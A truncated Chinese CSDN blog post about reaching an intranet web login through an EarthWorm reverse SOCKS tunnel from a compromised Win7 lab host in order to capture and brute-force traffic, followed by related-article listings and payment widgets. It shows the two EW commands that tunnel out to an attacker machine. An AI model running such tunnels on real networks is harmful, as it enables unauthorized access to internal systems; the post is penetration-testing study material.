内网穿透抓包

最新推荐文章于 2024-07-25 08:50:21 发布
最新推荐文章于 2024-07-25 08:50:21 发布
阅读量1k 收藏 3
点赞数
分类专栏: WEB 文章标签: 安全 web安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blue_fantasy/article/details/122423837
版权

提出问题: 通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢?如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢?

一、实验环境

二、实验工具

Earthworm:下载地址:http://rootkiter.com/EarthWorm/

三、操作步骤

首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。

知识点:

正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端。
反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端。

一般当有防火墙过滤时,正向连接无法建立时,尝使用反向代理的方式将目标机器的流量代理出来,所以这里就用到了代理中的大杀器EW。

EW关于代理的部分知识也很简单,这里不对其所有的代理方法进行介绍,只对反向代理中用到的部分进行阐述。

Kali:./ew_for_linux64 -s rcsocks -l 1080 -e 8880

该命令是将本地1080端口的流量走向本地8880端口

Win7靶机:ew.exe -s rssocks -d 172.17.60.226 -e 8880

该命令是将Win7

最低0.47元/天 解锁文章
blue_fantasy
关注
专栏目录
【网络安全】内网渗透(四):数据包捕获
weixin_49298681的博客
01-06 376
本博文仅供学习使用,请勿他用!!!网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现;内网渗透(一):获得权限内网渗透(二):权限提升内网渗透(三):信息收集内网渗透(四):数据包捕获本文将会介绍如何捕获数据包以便收集更多的信息;
简单的内网抓包软件
07-04
运行环境winxp+vc6.0,简单的内网抓包软件,抓取IP数据包并显示IP头部各字段信息,供IP协议学习使用。
wireshark10个抓包技巧(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
07-25 4038
w 保存的文件路径及文件名称;强大的Wireshark还是有招应对的,“统计”→“会话”,分别按数据包个数和字节大小统计,很快可以看到是哪些ip地址之间的流量是最大的,后续重点排查这些ip即可,如下图,10.63.16.77和10.88.14.119流量是最大的。Wireshark中流量图工具,就可以帮助完成这个画图标注过程,打开抓包文件后,“统计”→“流量图”,“显示”选“显示的分组”,如下图,对比标准radius协议交互过程就能清晰看出哪个过程有问题。@网 络 工 程 师 俱 乐 部。
【内网技巧】windows下网络抓包-netsh技巧(文末附免费学习资料)
weixin_49058775的博客
11-16 6031
相信大家做一些项目,在获取到pc权限后,翻翻文件,查查浏览器记录,但是有些浏览器的账户密码,读取不出来,一些基于key验证的应用提取不出来,如果权限比较高或者过uac的情况下,我们也可以抓取用户的流量,把他提取出来 0x01netsh介绍 工具涉及系统版本 Windows 7/8.x/10 所有版本 Windows Server 2008 R2/2012/2012 R2/2016/2019 netsh(Network Shell)是一个windows系统本身提供的功能强...
内网指定目标抓包
s0mor
08-20 1262
kali: nmap -sP 192.168.0.1/24 确定目标 利用 tcpdump 抓包: tcpdump -i eth0 host 192.168.0.1 -w /usr/document/test.cap 稍等一会,按ctrl+c停止抓包 抓取的包保存在/usr/document/test.cap ...
内网穿透如何支持 ftp 服务
lingdlz的专栏
07-08 2025
我们在 内网穿透实战 中简单介绍了下我们实现内网穿透的基本原理,在我们的方案中理论上可以支持所有的 tcp/udp 服务,但其中某些服务可能在应用层有服务地址交换,这种服务我们默认是不支持的,比如 ftp 服务,今天我们以ftp 服务为例来说明下我们怎么支持穿透这种类型的服务,在此之前先来了解下我们建立内网穿透将内网服务映射到访问端的过程。内网穿透服务映射基本原理和过程假设我们有个内网服务A 需要穿透访问,服务A 为tcp 服务,在ip1/port1 上监听,我们的内网端 mt_proxy_client_i
负载均衡篇-LVS引出的网络知识:NAT、内网穿透及P2P
oatlmy
08-25 1354
从NAT出发,进一步引出内网穿透,然后引出P2P以及BT下载
聊聊第一个开源项目(内网穿透) - CProxy
pythonxxoo的博客
03-06 1760
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 文章首发:聊聊第一个开源项目 - CProxy 作者:会玩code 初衷 最近在学C++,想写个项目练练手。对网络比较感兴趣,之前使用过ngrok(GO版本的内网穿透项目),看了部分源码,想把自己的一些优化想法用C++实现一下,便有了这个项目。 项目介绍 CProxy是一个反向
内网穿透从搭建到溯源(内网隧道搭建、绕过、隧道流量分析、日志分析、隧道防护)
墨痕诉清风的博客
02-24 4235
背景 在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。 本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从不同的网络协议层进行搭建隧道进行绕过,并对不同类型的隧道流量或者日志进行分析,帮助攻击或防守人员从溯源的维度更好的掌握内网穿透技术。 .
内网抓包工具ethereal的使用教程
12-19
内网抓包工具ethereal的使用教程,内网抓包工具ethereal的使用教程
嗅探器(网络抓包
08-03
嗅探器即网络抓包,在局域网内通过监听捕获数据包进行分析,获得数据包负载的各种网络信息。
局域网抓包工具http
04-10
局域网抓包工具可以抓取局域网所有http响应,需要安装winpcap驱动内有,内有源码,可以合并同一个ack的数据包,还原成一个html明文
网络端口监控工具,网络抓包工具
03-08
轻量级的本地网络端口监控,网络抓包工具,可选择端口监控,可以把监控内容保持成文本文件
抓取局域网内所有包
u014415274的博客
08-19 487
抓包
网络嗅探工具
m0_61511416的博客
03-12 447
常用的工具有wireshark和tcpdump.网络嗅探: 其实就是通过使用网络嗅探工具抓包, 分析和研究,4 指定源主机或者目的主机: src dst。5 抓包时指定端口:port。2 将抓到的包保存到文件中。3 指定主机--host。6 抓包的时候指定协议。
全网最全Fiddler抓包教程,一小时精通,学完别去做坏事~
shanmao001的博客
03-19 3990
Fiddler可以通过伪造CA证书来欺骗浏览器和服务器。大概原理就是在浏览器面前Fiddler伪装成一个HTTPS服务器,而在真正的HTTPS服务器面前Fiddler又装成浏览器,从而实现解密HTTPS数据包的目的。解密HTTPS需要手动开启,依次点击:Tools –> Fiddler Options –> HTTPS ->勾选Decrypt HTTPS traffic -> 点击Yes,在弹出的对话框中选择是即可,如图12所示。
网络工程师必备10个抓包技巧(非常详细)零基础入门到精通,收藏这一篇就够了
Python_0011的博客
06-04 2016
w 保存的文件路径及文件名称;强大的Wireshark还是有招应对的,“统计”→“会话”,分别按数据包个数和字节大小统计,很快可以看到是哪些ip地址之间的流量是最大的,后续重点排查这些ip即可,如下图,10.63.16.77和10.88.14.119流量是最大的。Wireshark中流量图工具,就可以帮助完成这个画图标注过程,打开抓包文件后,“统计”→“流量图”,“显示”选“显示的分组”,如下图,对比标准radius协议交互过程就能清晰看出哪个过程有问题。@网 络 工 程 师 俱 乐 部。
frp内网穿透教程:部署与使用
**内网穿透技术:FRP简介** **一、什么是FRP(Fast Reverse Proxy)** FRP是一款功能强大的内网穿透工具,它基于高性能的反向代理设计,支持TCP、UDP协议,以及HTTPHTTPS应用协议,甚至尝试性支持点对点穿透。它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值